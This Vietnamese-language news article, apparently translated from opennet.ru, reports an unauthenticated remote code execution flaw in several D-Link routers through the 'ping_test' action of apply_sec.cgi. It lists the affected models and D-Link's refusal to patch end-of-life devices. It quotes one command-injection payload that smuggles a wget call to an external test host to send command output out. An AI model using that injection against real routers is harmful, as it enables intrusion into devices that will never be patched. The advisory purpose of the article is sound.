Lỗ hổng có thể khai thác từ xa trong bộ định tuyến D-Link

Trong bộ định tuyến không dây D-Link xác định lỗ hổng nguy hiểm (CVE-2019 Phiên16920), cho phép bạn thực thi mã từ xa ở phía thiết bị bằng cách gửi yêu cầu đặc biệt tới trình xử lý “ping_test”, có thể truy cập được mà không cần xác thực.

Điều thú vị là, theo các nhà phát triển chương trình cơ sở, lệnh gọi “ping_test” chỉ nên được thực hiện sau khi xác thực, nhưng trên thực tế, nó vẫn được gọi trong mọi trường hợp, bất kể đăng nhập vào giao diện web. Cụ thể, khi truy cập tập lệnh apply_sec.cgi và truyền tham số “action=ping_test”, tập lệnh sẽ chuyển hướng đến trang xác thực, nhưng đồng thời thực hiện hành động liên quan đến ping_test. Để thực thi mã, một lỗ hổng khác đã được sử dụng trong chính ping_test, gọi tiện ích ping mà không kiểm tra chính xác tính chính xác của địa chỉ IP được gửi để kiểm tra. Ví dụ: để gọi tiện ích wget và chuyển kết quả của lệnh “echo 1234” sang máy chủ bên ngoài, chỉ cần chỉ định tham số “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".

Lỗ hổng có thể khai thác từ xa trong bộ định tuyến D-Link

Sự hiện diện của lỗ hổng đã được xác nhận chính thức trong các mô hình sau:

  • DIR-655 với phần sụn 3.02b05 trở lên;
  • DIR-866L với phần sụn 1.03b04 trở lên;
  • DIR-1565 với phần sụn 1.01 trở lên;
  • DIR-652 (không cung cấp thông tin về các phiên bản phần mềm có vấn đề)

Thời gian hỗ trợ cho các dòng máy này đã hết nên D-Link đã nêu, sẽ không phát hành bản cập nhật để loại bỏ lỗ hổng bảo mật, không khuyến nghị sử dụng chúng và khuyên nên thay thế chúng bằng thiết bị mới. Để giải quyết vấn đề bảo mật, bạn có thể hạn chế quyền truy cập vào giao diện web chỉ ở những địa chỉ IP đáng tin cậy.

Sau đó người ta phát hiện ra rằng lỗ hổng này cũng ảnh hưởng các mẫu DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 và DIR-825, có kế hoạch phát hành các bản cập nhật chưa được biết đến.

Nguồn: opennet.ru

Thêm một lời nhận xét